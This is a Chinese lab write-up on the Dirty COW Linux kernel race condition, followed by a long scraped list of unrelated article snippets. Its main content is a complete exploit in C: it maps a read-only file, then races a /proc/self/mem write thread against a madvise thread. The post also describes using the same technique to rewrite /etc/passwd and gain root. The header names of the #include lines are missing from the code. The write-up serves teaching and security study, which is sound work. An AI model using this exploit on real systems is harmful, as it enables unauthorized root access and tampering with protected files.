ustc_sec
ustc_sec

软件安全-Dirty-COW攻防

Dirty COW Attack Lab

存在于linux内核(2007年),被发现和利用于2016年
漏洞存在于内核的copy-on-write技术
通过这个漏洞,攻击者可以获得root权限
实验基于ubuntu12

Modify a Dummy Read-Only File

目标:使用Dirty COW漏洞对一个只读文件进行写操作

Create a Dummy File

Set Up the Memory Mapping Thread

#include 
#include 
#include 
#include 
#include 

void *map;
void *writeThread(void *arg);
void *madviseThread(void *arg);

int main(int argc, char *argv[])
{
  pthread_t pth1,pth2;
  struct stat st;
  int file_size;

  // Open the target file in the read-only mode.
  int f=open("/zzz", O_RDONLY);

  // Map the file to COW memory using MAP_PRIVATE.
  //将已经打开的文件描述符f的文件状态复制到&st指针指向的数据结构中
  fstat(f, &st);
  file_size = st.st_size;
  //mmap()将一个文件或对象映射进内存,成功返回被映射区的指针,失败时返回-1
  //参数1:映射区的开始地址,设置为0表示由系统决定
  //参数2:映射区的长度,单位是字节
  //参数3:期望的内存保护标志,不能与文件打开模式冲突
  //参数4:指定映射对象的类型,映射选项和映射页是否可以共享,MAP_PRIVATE不会影响原文件
  //参数5:有效的文件描述符
  //参数6:被映射对象的起点
  map=mmap(NULL, file_size, PROT_READ, MAP_PRIVATE, f, 0);

  // Find the position of the target area
  char *position = strstr(map, "222");                        

  // We have to do the attack using two threads.
  //pthread_create()创建线程,在线程创建后就开始运行相关的线程函数,成功返回0,失败返回-1
  //参数1:指向线程标识符的指针
  //参数2:设置线程属性
  //参数3:线程运行函数的起始地址
  //参数4:运行函数的参数
  pthread_create(&pth1, NULL, madviseThread, (void  *)file_size); 
  pthread_create(&pth2, NULL, writeThread, position);             

  // Wait for the threads to finish.
  //pthread_join()等待线程结束,成功返回0,失败返回错误号
  //参数1:线程标识符,就是线程ID
  //参数2:用户定义的指针,用来存储被等待线程的返回值
  pthread_join(pth1, NULL);
  pthread_join(pth2, NULL);
  return 0;
}

Set Up the write Thread

void *writeThread(void *arg)
{
  char *content= "***";
  off_t offset = (off_t) arg;

  int f=open("/proc/self/mem", O_RDWR);
  while(1) {
    // Move the file pointer to the corresponding position.
    //lseek()控制文件的读写位置
    //参数1:已经打开的文件描述符
    //参数2:偏移量
    //参数3:SEEK_SET将读写位置指向文件头后再增加offset个偏移
    lseek(f, offset, SEEK_SET);
    // Write to the memory.
    write(f, content, strlen(content));
  }
}

The madvise Thread

void *madviseThread(void *arg)
{
  int file_size = (int) arg;
  while(1){
      //madvise()建议内核如何处理一段地址范围的页面输入输出,成功返回0,失败返回-1
      //参数1:起始地址
      //参数2:地址长度
      //参数3:建议,MADV_DONTNEDD此范围内的页面在后续访问将会成功,但将导致从存储重新加载底层映射文件
      madvise(map, file_size, MADV_DONTNEED);
  }
}

Launch the Attack

软件安全-Dirty-COW攻防_第1张图片
Launch the Attack

Modify the password File to Gain the Root Privilege

同理,修改/etc/passwd文件,将用户gu-u12的uid gid由1000修改成0
当有用户test1切换到用户gu-u12的时候,将会看到gu-u12已经获得root权限

软件安全-Dirty-COW攻防_第2张图片
获得root权限

你可能感兴趣的:(软件安全-Dirty-COW攻防)

  • 2025年SDK游戏盾终极解析:重新定义手游安全的“隐形护甲” 上海云盾商务经理杨杨 游戏安全
    副标题:从客户端加密到AI反外挂,拆解全链路防护如何重塑游戏攻防天平引言:当传统高防在手游战场“失效”2025年全球手游市场规模突破$2000亿,黑客单次攻击成本却降至$30——某SLG游戏因协议层CC攻击单日流失37%玩家,某开放世界游戏遭低频DDoS瘫痪6小时损失千万。传统高防IP的致命短板暴露无遗:无法识别伪造客户端流量、难防协议篡改、误杀率超15%。而集成于游戏终端的SDK游戏盾,正以“源
  • Wireshark攻防实战
    一、基础环境配置安全捕获环境搭建#创建隔离环境并抓包sudoiplinkseteth0promisconsudotcpdump-ieth0-s0-w/mnt/isolated/evidence.pcap高危协议快速过滤tcp.portin{135,139,445,3389}||udp.portin{53,123,161,500,4500}关键字段标记技巧右键IP→ApplyasColumn设置TT
  • 网站渗透测试完全手册:零基础到进阶,系统学习网络安全攻防
    渗透测试介绍渗透测试就是模拟攻击者入侵系统,对系统进行一步步地渗透,发现系统地脆弱环节和隐藏风险。最后形成测试报告提供给系统所有者。系统所有者可根据该测试报告对系统进行加固,提升系统的安全性,防止真正的攻击者入侵。渗透测试的前提一定是得经过系统所有者的授权!未经过授权的渗透测试,就是违法行为!渗透测试意义信息安全评估的重要方法,有利于掌握系统整体安全强度。模拟黑客攻击和思维,评估计算机潜在风险。发
  • 【攻防世界】 web | fileclude 详细题解WP white-persist 攻防世界WEB前端android原型模式pythonphp
    【攻防世界】web|fileclude详细题解WP打开环境首先代码审计阅读代码,有include()函数并且有GET传参的file1、file2的两个参数,猜测是文件包含伪协议题目文件包含伪协议【攻防世界】web|file_include详细题解WP-CSDN博客在我的一篇博客中有过一些详细的介绍,需要的话可以看看核心突破点在于:file_get_contents($file2)===“hello
  • 技战法-正向隧道和反向隧道防御 YCL大摆子 网络
    一、背景在网络安全攻防演练中,攻击者在成功植入Webshell后,往往会快速构建通信隧道(含正向隧道与反向隧道两种模式)。通过建立的隐蔽隧道,攻击者可突破现有安全防护边界,对目标系统实施深度攻击(如权限提升)及内网横向移动,规避传统监测手段。基于对正向/反向隧道构建特征的分析,结合应用系统架构特性,强化隧道检测与阻断机制,提升攻击利用难度二、正向代理和反向代理设备一、正向隧道设备与机制正向隧道由内
  • 技战法-多角度取证提升反制效果 YCL大摆子 网络安全
    一、技战法概述溯源反制核心目标通过对攻击源的追踪分析,精准定位攻击者身份信息(姓名、电话、邮箱、公司、网络ID、物理位置),构建完整攻击者画像。基于画像数据解析攻击手法特征(如漏洞利用路径、工具链偏好),预判后续攻击趋势并制定针对性防御策略。在攻防演习中强化蓝队取证能力,并为真实攻击事件提供司法取证支持(如协助公安机关固定电子证据链)。溯源反制双重价值防御能力提升:通过溯源案例复盘,暴露内部人员信
  • 真千金才是攻防大神(苏野宋熙)火爆小说_《真千金才是攻防大神》苏野宋熙小说免费在线阅读 热门小说全文看
    书名:真千金才是攻防大神主角:苏野宋熙简介:前世防御系统大赛上,男友的女神提交了和我一样的程序模式。我哥出来给女神作证,说我不要脸,是我抄袭女神。我被所有人网暴,甚至连我亲生父母都不肯相信我,他们说我丢人,还不如去死。最终我如他们所愿得病而死,>>>>>>>请前往文章底部全文完整免费阅读>>>>>>>>>戳我继续阅读<<<<<<<<<<关注微信公众号【魔书朗阅】去回个书名或主配角,即可免费阅读【真
  • 2025年工业控制系统安全实战指南:Modbus协议漏洞攻防全解析(附PLC防御代码与资源包) 全息架构师 安全web安全网络安全
    2025年工业控制系统安全实战指南:Modbus协议漏洞攻防全解析(附PLC防御代码与资源包)摘要:随着工业4.0的深化,Modbus协议的安全漏洞已成为工业控制系统的致命弱点。本文深度剖析2024-2025年十大PLC攻击案例,结合施耐德ModiconPLC高危漏洞(CVE-2021-22779)、西门子S7commPlus协议破解等最新事件,提供全栈式防御方案,并附赠PLC安全加固代码模板与工
  • Windows Installer安全深度剖析 Bruce_xiaowei 总结经验笔记windows安全网络安全运维
    WindowsInstaller安全深度剖析作为Windows生态的核心组件,WindowsInstaller(msiexec.exe)负责管理软件安装、维护和卸载。其高权限特性使其成为攻击者眼中的“黄金靶标”。本文从攻防两端深入解析其工作机制、历史漏洞、攻击手法及防御策略。一、WindowsInstaller基础架构与攻击面核心组件与权限模型MSI包结构:采用数据库格式(.msi文件),包含安装
  • 重装世界第四十章----对抗老二 森断武尊
    雅祁在第一时间飞去阻止,却被老二一巴掌拍飞,得意的老二还向雅祁发出胜利一般的怒吼,卡看来应该是四个核心导致了主意识破碎吧,反正已经成了野兽了。"敢在我的地盘撒野……"说着,倒飞出去的雅祁的身形瞬间变大手持一柄长枪,和一面盾牌,据说这两件武器是玛雅族的上古之人用以神金炼制而成的武器,攻防兼备,威力极强。老二也是瞬间来到了雅祁的面前,雅祁一惊,提盾防御,却被老二迎面一拳打飞,不过好在有了盾牌的阻挡,雅
  • AI人工智能数据安全的攻防策略 AI大模型应用工坊 AgenticAI实战人工智能ai
    AI人工智能数据安全的攻防策略:数字世界的智能守护战1.引入与连接:当智能遇上脆弱开场故事:2023年,一家领先的AI医疗公司遭遇了前所未有的数据breach——黑客不仅窃取了10万患者的敏感医疗记录,更通过逆向工程提取了其诊断AI模型的核心参数。这次攻击造成的损失不仅是数亿美元的赔偿,更是公众对AI医疗信任的崩塌。与你相关:当你使用语音助手记录私人想法,或健康APP分析你的医疗数据时,这些AI系
  • 十大兼职赚钱软件排行,10个真实靠谱赚钱还快的app推荐 古楼
    有没有人想知道十大赚钱最快的兼职app么?小编觉得肯定有人想知道,但是很多人想知道的肯定是“哪个赚钱的app是比较靠谱的,而且赚钱比较快”?不得不感叹,现在的手机发展真的很快。在家赚钱只需要一部手机所以,小编认为,如果人们想在家里用手机赚钱,肯定需要备用多达10个快速可靠的软件,但很多人希望这些软件安全,能够快速真实地提现。目前网上确实有很多不靠谱不安全的赚钱app。以下有几个APP是小编使用过的
  • 【客户案例】医疗设备行业借助Parasoft实现代码零缺陷与合规双赢 慧都小项 软件测试医疗设备代码质量静态代码分析FDA认证左移测试
    在全球新冠疫情最严峻的时刻,呼吸机成为拯救重症患者的关键设备。然而,医疗设备的软件安全容不得半点疏忽——哪怕一行代码出错,都可能危及生命。Inovytec公司研发的VentwaySparrow呼吸机不仅通过了FDA510(k)严苛认证,更实现了“零缺陷”的代码质量。他们是如何做到的?答案在于静态代码分析工具ParasoftC/C++test的精准应用。本文将深入解析Inovytec的成功经验,并分
  • 【爬虫】05 - 爬虫攻防 是小崔啊 #爬虫学习爬虫
    爬虫05-爬虫攻防文章目录爬虫05-爬虫攻防一:随机User-Agent爬虫1:fake-useragent2:高级反反爬策略3:生产环境建议二:代理IP爬虫1:获取代理IP2:高阶攻防3:企业级的代理实战三:动态数据的抓取1:动态页面技术全景2:动态页面逆向工程2.1:XHR请求追踪与解析2.2:websocket实时数据捕获3:无头浏览器控制技术3.1:Playwright详解3.2:反反爬虫
  • 《真千金才是攻防大神》(苏野宋熙)全本免费在线阅读~前世防御系统大赛上,男友的女神提交了和我一样的程序模式我哥出来给女神作证,说我不要脸,是我抄袭女神我被所有人网暴,甚至连我亲生父母都不肯相信我... 全本全集小说
    《真千金才是攻防大神》(苏野宋熙)全本免费在线阅读~前世防御系统大赛上,男友的女神提交了和我一样的程序模式我哥出来给女神作证,说我不要脸,是我抄袭女神我被所有人网暴,甚至连我亲生父母都不肯相信我,他们说我丢人,还不如去死主角配角:苏野宋熙简介:5我冷笑一声,“你不是已经和林嘉欣联手了么,有了林嘉欣这个天才,你还用找我修复系统么?”“宋熙!你是怎么跟你哥说话的!你赶紧给我滚回来!”电话又换成了我爸,
  • Python爬虫【四十五章】爬虫攻防战:异步并发+AI反爬识别的技术解密 程序员_CLUB Python入门到进阶python爬虫人工智能
    目录引言:当爬虫工程师遇上AI反爬官一、异步并发基础设施层1.1混合调度框架设计1.2智能连接池管理二、机器学习反爬识别层2.1特征工程体系2.2轻量级在线推理三、智能决策系统3.1动态策略引擎3.2实时对抗案例四、性能优化实战4.1全链路压测数据4.2典型故障处理案例五、总结:构建智能化的爬虫生态系统Python爬虫相关文章(推荐)引言:当爬虫工程师遇上AI反爬官在大数据采集领域,我们正经历着技
  • 代码签名:保障软件安全与可信的关键防线 Arwen303 代码签名SSL证书ssl网络协议网络
    在当今数字化时代,软件应用广泛渗透于各个领域,其安全性与可信度至关重要。代码签名作为一项核心技术手段,犹如软件世界的“数字身份证”,为软件的合法身份与完整性保驾护航。一、代码签名介绍(一)定义与原理代码签名是一种通过数字证书对软件代码进行数字签名的技术。它利用公钥加密体系,开发者使用私钥对代码进行签名,而用户端则通过对应的公钥来验证签名的有效性。当软件被签署后,任何对代码的篡改都会导致签名验证失败
  • 基于深度学习的和平精英(吃鸡)内置锁头训练 摆烂仙君 深度学习人工智能
    前言本教程以和平精英为例,主要讲解如何构建深度学习模型对游戏中角色进行头部标注,并控制鼠标对其进行锁定射击,同时围绕其游戏防作弊系统进行算法攻防讲解,该方案对于csgo,cf等游戏也同样适用。请注意,该教程仅供娱乐教学,若本教程评论超过100,将会开源相关代码并对实际的代码部署进行进一步分析。一、和平精英伤害机制分析在《刺激战场》(现为《和平精英》)中,击中头部的伤害远高于身体其他部位,这是由游戏
  • 第六十二天 服务攻防-框架安全&CVE复现&Spring&Struts&Laravela&ThinkPHP 清歌secure 网络安全全栈学习笔记安全springstruts
    第62天服务攻防-框架安全&CVE复现&Spring&Struts&Laravela&ThinkPHP知识点:中间件及框架列表:IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic.JBoos,WebSphere,Jenkins,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flas
  • 红队攻防渗透技术实战流程:框架安全:Laravel&Thinkphp&Struct2&SpringBoot HACKNOE 红队攻防渗透技术研习室安全nginxapache
    红队攻防渗透实战1.框架安全1.1PHP-框架安全-Thinkphp&Laravel1.1.1Laravel是一套简洁、优雅的PHPWeb开发框架(PHPWebFramework)。1.1.1.1CVE-2021-3129RCE1.1.2Thinkphp-3.XRCE-6.XRCE1.1.2.1ThinkPHP综合工具1.1.2.26.XlangRCE1.2J2EE-框架安全-SpringBoot
  • 2025年渗透测试面试题总结-2025年HW(护网面试) 43(题目+回答) 独行soc 2025年护网面试职场和发展linux科技渗透测试安全护网
    安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录2025年HW(护网面试)431.自我介绍与职业规划2.Webshell源码级检测方案3.2025年新型Web漏洞TOP54.渗透中的高价值攻击点5.智能Fuzz平台架构设计6.堆栈溢出攻防演进7.插桩技术实战应用8.二进制安全能力矩阵9.C语言内存管理精要10.Pyth
  • 网络安全核心技术解析:权限提升(Privilege Escalation)攻防全景
    引言在网络安全攻防对抗中,权限提升(PrivilegeEscalation)是攻击链条中关键的「破局点」。攻击者通过突破系统权限壁垒,往往能以有限权限为跳板,最终掌控整个系统控制权。本文将从攻击原理、技术路径、实战案例到防御体系,全方位解析这一网络空间的「钥匙窃取」艺术。一、权限提升的本质与分类1.1核心定义权限提升指攻击者通过技术手段,将当前运行进程或用户的权限等级突破系统预设的访问控制机制,获
  • 全球DeepFake攻防挑战赛&DataWhale AI 夏令营——图像赛道 czijin 人工智能deeplearning
    全球DeepFake攻防挑战赛&DataWhaleAI夏令营——图像赛道赛题背景随着人工智能技术的迅猛发展,深度伪造技术(Deepfake)正成为数字世界中的一把双刃剑。这项技术不仅为创意内容的生成提供了新的可能性,同时也对数字安全构成了前所未有的挑战。Deepfake技术可以通过人工智能算法生成高度逼真的图像、视频和音频内容,这些内容看起来与真实的毫无二致。然而,这也意味着虚假信息、欺诈行为和隐
  • 从0到1:SQL注入与XSS攻防实战——数据库安全加固全攻略 小张在编程 sqlxss数据库
    引言2023年某电商平台用户数据泄露事件中,黑客仅用一行username='OR'1'='1的登录输入,就拖走了百万用户信息;另一家社交网站更离谱,用户在评论区输入alert('xss'),竟让千万级用户的浏览器成了“提线木偶”。这些看似简单的攻击,为何能撕开企业安全防线?今天我们就来拆解SQL注入与XSS的“作案手法”,并给出一套可落地的数据库安全加固方案——毕竟,防住这两类攻击,能解决80%的
  • 黑客攻防演练之:红队攻击の常见战术及案例 黑客飓风 web安全安全网络
    HVV和HW最近大家看到的比较多,一般指的攻防演练。“攻防演练”通常是指在网络安全领域中,通过模拟攻击和防御的对抗过程,来检验和提升系统安全性、人员技能水平以及应对突发事件能力的一种实践性活动。什么是红队攻防演练,也常被称为“网络安全攻防演练”或“红蓝对抗演练”,是一种通过模拟网络攻击和防御过程,来评估和提升网络安全防护能力的实践活动。它广泛应用于网络安全领域,以及军事、企业、政府机构等多个行业,
  • Redis面试通关秘籍:从缓存穿透到分布式锁的深度剖析 码海漫游者8 缓存redis面试
    文章目录前言:为什么Redis总是面试必考题?(灵魂拷问)一、Redis持久化:RDB和AOF的相爱相杀1.1RDB快照原理(画重点)1.2AOF日志的生存之道二、缓存三大杀手:穿透/击穿/雪崩(死亡三连问)2.1缓存穿透攻防战2.2缓存击穿应急预案2.3雪崩灾难现场还原三、Redis分布式锁的六大陷阱(血泪教训)3.1经典错误示范3.2正确姿势(Redlock算法)3.3时钟漂移的致命影响四、高
  • 数字沙盘的工作原理和架构
    大家读完觉得有帮助记得关注和点赞!!!**网络安全数字沙盘**是一种融合**攻防推演、态势仿真、决策支持**的交互式平台,通过数字孪生技术构建企业网络全景镜像,实现安全风险的动态预判与响应验证。以下从核心原理到架构的深度解析:---###一、数字沙盘核心工作原理####**三层核心能力**```mermaidgraphLRA[网络空间映射]-->B[攻击路径推演]B-->C[防御效果仿真]C-->
  • 网络安全之注入攻击:原理、危害与防御之道
    网络安全之注入攻击:原理、危害与防御之道引言在OWASPTop10安全风险榜单中,注入攻击常年占据首位。2023年Verizon数据泄露调查报告显示,67%的Web应用漏洞与注入类攻击直接相关。本文从技术视角系统解析注入攻击的核心原理、典型场景及防御体系,揭示这一"网络安全头号杀手"的攻防博弈。一、注入攻击的本质与分类1.1基本定义当应用程序将非可信数据(UntrustedData)作为代码解析时
  • 网络安全之XSS漏洞:原理、危害与防御实践 weixin_47233946 信息安全web安全xss安全
    引言跨站脚本攻击(Cross-SiteScripting,XSS)作为OWASP十大Web应用安全风险中的常客,是开发者必须掌握的核心攻防领域。不同于其他漏洞的直接性,XSS通过浏览器端的代码注入实现攻击传播,具有隐蔽性强、危害多样的特点。本文将深入剖析XSS漏洞的底层逻辑,探讨其实际影响,并提供系统化的防御方案。一、XSS攻击技术原理1.1浏览器执行上下文混淆XSS的根本成因在于开发者未能正确处
  • 攻防对抗的工作原理和架构 hao_wujing 安全
    大家读完觉得有帮助记得关注和点赞!!!**攻防对抗(CyberKillChainDefense)**是网络安全领域的动态博弈过程,攻击方通过**入侵链**突破防御,防御方则构建**纵深的检测响应体系**进行拦截反制。其本质是**攻击成本与防御效能的持续对抗升级**。以下从工作原理到架构的深度解析:---###一、攻防对抗核心工作原理####**攻击链(CyberKillChain)vs防御链(De
  • 面向对象面向过程 3213213333332132 java
    面向对象:把要完成的一件事,通过对象间的协作实现。 面向过程:把要完成的一件事,通过循序依次调用各个模块实现。 我把大象装进冰箱这件事为例,用面向对象和面向过程实现,都是用java代码完成。 1、面向对象 package bigDemo.ObjectOriented; /** * 大象类 * * @Description * @author FuJian
  • Java Hotspot: Remove the Permanent Generation bookjovi HotSpot
      openjdk上关于hotspot将移除永久带的描述非常详细,http://openjdk.java.net/jeps/122   JEP 122: Remove the Permanent Generation Author Jon Masamitsu Organization Oracle Created 2010/8/15 Updated 2011/
  • 正则表达式向前查找向后查找,环绕或零宽断言 dcj3sjt126com 正则表达式
    向前查找和向后查找 1. 向前查找:根据要匹配的字符序列后面存在一个特定的字符序列(肯定式向前查找)或不存在一个特定的序列(否定式向前查找)来决定是否匹配。.NET将向前查找称之为零宽度向前查找断言。     对于向前查找,出现在指定项之后的字符序列不会被正则表达式引擎返回。 2. 向后查找:一个要匹配的字符序列前面有或者没有指定的
  • BaseDao 171815164 seda
    import java.sql.Connection; import java.sql.DriverManager; import java.sql.SQLException; import java.sql.PreparedStatement; import java.sql.ResultSet; public class BaseDao { public Conn
  • Ant标签详解--Java命令 g21121 Java命令
            这一篇主要介绍与java相关标签的使用         终于开始重头戏了,Java部分是我们关注的重点也是项目中用处最多的部分。           1
  • [简单]代码片段_电梯数字排列 53873039oycg 代码
           今天看电梯数字排列是9 18 26这样呈倒N排列的,写了个类似的打印例子,如下:       import java.util.Arrays; public class 电梯数字排列_S3_Test { public static void main(S
  • Hessian原理 云端月影 hessian原理
    Hessian 原理分析 一.      远程通讯协议的基本原理 网络通信需要做的就是将流从一台计算机传输到另外一台计算机,基于传输协议和网络 IO 来实现,其中传输协议比较出名的有 http 、 tcp 、 udp 等等, http 、 tcp 、 udp 都是在基于 Socket 概念上为某类应用场景而扩展出的传输协
  • 区分Activity的四种加载模式----以及Intent的setFlags aijuans android
      在多Activity开发中,有可能是自己应用之间的Activity跳转,或者夹带其他应用的可复用Activity。可能会希望跳转到原来某个Activity实例,而不是产生大量重复的Activity。 这需要为Activity配置特定的加载模式,而不是使用默认的加载模式。 加载模式分类及在哪里配置 Activity有四种加载模式: standard singleTop
  • hibernate几个核心API及其查询分析 antonyup_2006 html.netHibernatexml配置管理
    (一)  org.hibernate.cfg.Configuration类         读取配置文件并创建唯一的SessionFactory对象.(一般,程序初始化hibernate时创建.)         Configuration co
  • PL/SQL的流程控制 百合不是茶 oraclePL/SQL编程循环控制
    PL/SQL也是一门高级语言,所以流程控制是必须要有的,oracle数据库的pl/sql比sqlserver数据库要难,很多pl/sql中有的sqlserver里面没有   流程控制; 分支语句 if 条件 then 结果 else 结果 end if ; 条件语句 case when 条件 then 结果; 循环语句 loop
  • 强大的Mockito测试框架 bijian1013 mockito单元测试
    一.自动生成Mock类        在需要Mock的属性上标记@Mock注解,然后@RunWith中配置Mockito的TestRunner或者在setUp()方法中显示调用MockitoAnnotations.initMocks(this);生成Mock类即可。二.自动注入Mock类到被测试类  &nbs
  • 精通Oracle10编程SQL(11)开发子程序 bijian1013 oracle数据库plsql
    /* *开发子程序 */ --子程序目是指被命名的PL/SQL块,这种块可以带有参数,可以在不同应用程序中多次调用 --PL/SQL有两种类型的子程序:过程和函数 --开发过程 --建立过程:不带任何参数 CREATE OR REPLACE PROCEDURE out_time IS BEGIN DBMS_OUTPUT.put_line(systimestamp); E
  • 【EhCache一】EhCache版Hello World bit1129 Hello world
    本篇是EhCache系列的第一篇,总体介绍使用EhCache缓存进行CRUD的API的基本使用,更细节的内容包括EhCache源代码和设计、实现原理在接下来的文章中进行介绍   环境准备 1.新建Maven项目   2.添加EhCache的Maven依赖 <dependency> <groupId>ne
  • 学习EJB3基础知识笔记 白糖_ beanHibernatejbosswebserviceejb
    最近项目进入系统测试阶段,全赖袁大虾领导有力,保持一周零bug记录,这也让自己腾出不少时间补充知识。花了两天时间把“传智播客EJB3.0”看完了,EJB基本的知识也有些了解,在这记录下EJB的部分知识,以供自己以后复习使用。   EJB是sun的服务器端组件模型,最大的用处是部署分布式应用程序。EJB (Enterprise JavaBean)是J2EE的一部分,定义了一个用于开发基
  • angular.bootstrap boyitech AngularJSAngularJS APIangular中文api
    angular.bootstrap 描述:     手动初始化angular。     这个函数会自动检测创建的module有没有被加载多次,如果有则会在浏览器的控制台打出警告日志,并且不会再次加载。这样可以避免在程序运行过程中许多奇怪的问题发生。   使用方法:     angular .
  • java-谷歌面试题-给定一个固定长度的数组,将递增整数序列写入这个数组。当写到数组尾部时,返回数组开始重新写,并覆盖先前写过的数 bylijinnan java
    public class SearchInShiftedArray { /** * 题目:给定一个固定长度的数组,将递增整数序列写入这个数组。当写到数组尾部时,返回数组开始重新写,并覆盖先前写过的数。 * 请在这个特殊数组中找出给定的整数。 * 解答: * 其实就是“旋转数组”。旋转数组的最小元素见http://bylijinnan.iteye.com/bl
  • 天使还是魔鬼?都是我们制造 ducklsl 生活教育情感
    ----------------------------剧透请原谅,有兴趣的朋友可以自己看看电影,互相讨论哦!!!     从厦门回来的动车上,无意中瞟到了书中推荐的几部关于儿童的电影。当然,这几部电影可能会另大家失望,并不是类似小鬼当家的电影,而是关于“坏小孩”的电影!     自己挑了两部先看了看,但是发现看完之后,心里久久不能平
  • [机器智能与生物]研究生物智能的问题 comsci 生物
          我想,人的神经网络和苍蝇的神经网络,并没有本质的区别...就是大规模拓扑系统和中小规模拓扑分析的区别....       但是,如果去研究活体人类的神经网络和脑系统,可能会受到一些法律和道德方面的限制,而且研究结果也不一定可靠,那么希望从事生物神经网络研究的朋友,不如把
  • 获取Android Device的信息 dai_lm android
    String phoneInfo = "PRODUCT: " + android.os.Build.PRODUCT; phoneInfo += ", CPU_ABI: " + android.os.Build.CPU_ABI; phoneInfo += ", TAGS: " + android.os.Build.TAGS; ph
  • 最佳字符串匹配算法(Damerau-Levenshtein距离算法)的Java实现 datamachine java算法字符串匹配
    原文:http://www.javacodegeeks.com/2013/11/java-implementation-of-optimal-string-alignment.html------------------------------------------------------------------------------------------------------------
  • 小学5年级英语单词背诵第一课 dcj3sjt126com englishword
    long 长的 show 给...看,出示 mouth 口,嘴 write 写   use 用,使用 take 拿,带来 hand 手 clever 聪明的   often 经常 wash 洗 slow 慢的 house 房子   water 水 clean 清洁的 supper 晚餐 out 在外   face 脸,
  • macvim的使用实战 dcj3sjt126com macvim
    macvim用的是mac里面的vim, 只不过是一个GUI的APP, 相当于一个壳   1. 下载macvim https://code.google.com/p/macvim/   2. 了解macvim :h               vim的使用帮助信息 :h macvim  
  • java二分法查找 蕃薯耀 java二分法查找二分法java二分法
    java二分法查找 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年6月23日 11:40:03 星期二 http:/
  • Spring Cache注解+Memcached hanqunfeng springmemcached
    Spring3.1 Cache注解  依赖jar包: <!-- simple-spring-memcached --> <dependency> <groupId>com.google.code.simple-spring-memcached</groupId> <artifactId>simple-s
  • apache commons io包快速入门 jackyrong apache commons
    原文参考 http://www.javacodegeeks.com/2014/10/apache-commons-io-tutorial.html   Apache Commons IO 包绝对是好东西,地址在http://commons.apache.org/proper/commons-io/,下面用例子分别介绍:   1)  工具类   2
  • 如何学习编程 lampcy java编程C++c
    首先,我想说一下学习思想.学编程其实跟网络游戏有着类似的效果.开始的时候,你会对那些代码,函数等产生很大的兴趣,尤其是刚接触编程的人,刚学习第一种语言的人.可是,当你一步步深入的时候,你会发现你没有了以前那种斗志.就好象你在玩韩国泡菜网游似的,玩到一定程度,每天就是练级练级,完全是一个想冲到高级别的意志力在支持着你.而学编程就更难了,学了两个月后,总是觉得你好象全都学会了,却又什么都做不了,又没有
  • 架构师之spring-----spring3.0新特性的bean加载控制@DependsOn和@Lazy nannan408 Spring3
    1.前言。    如题。 2.描述。    @DependsOn用于强制初始化其他Bean。可以修饰Bean类或方法,使用该Annotation时可以指定一个字符串数组作为参数,每个数组元素对应于一个强制初始化的Bean。 @DependsOn({"steelAxe","abc"}) @Comp
  • Spring4+quartz2的配置和代码方式调度 Everyday都不同 代码配置spring4quartz2.x定时任务
    前言:这些天简直被quartz虐哭。。因为quartz 2.x版本相比quartz1.x版本的API改动太多,所以,只好自己去查阅底层API……   quartz定时任务必须搞清楚几个概念: JobDetail——处理类 Trigger——触发器,指定触发时间,必须要有JobDetail属性,即触发对象 Scheduler——调度器,组织处理类和触发器,配置方式一般只需指定触发
  • Hibernate入门 tntxia Hibernate
      前言   使用面向对象的语言和关系型的数据库,开发起来很繁琐,费时。由于现在流行的数据库都不面向对象。Hibernate 是一个Java的ORM(Object/Relational Mapping)解决方案。   Hibernte不仅关心把Java对象对应到数据库的表中,而且提供了请求和检索的方法。简化了手工进行JDBC操作的流程。   如
  • Math类 xiaoxing598 Math
    一、Java中的数字(Math)类是final类,不可继承。 1、常数 PI:double圆周率 E:double自然对数 2、截取(注意方法的返回类型) double ceil(double d) 返回不小于d的最小整数 double floor(double d) 返回不大于d的整最大数 int round(float f) 返回四舍五入后的整数 long round
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他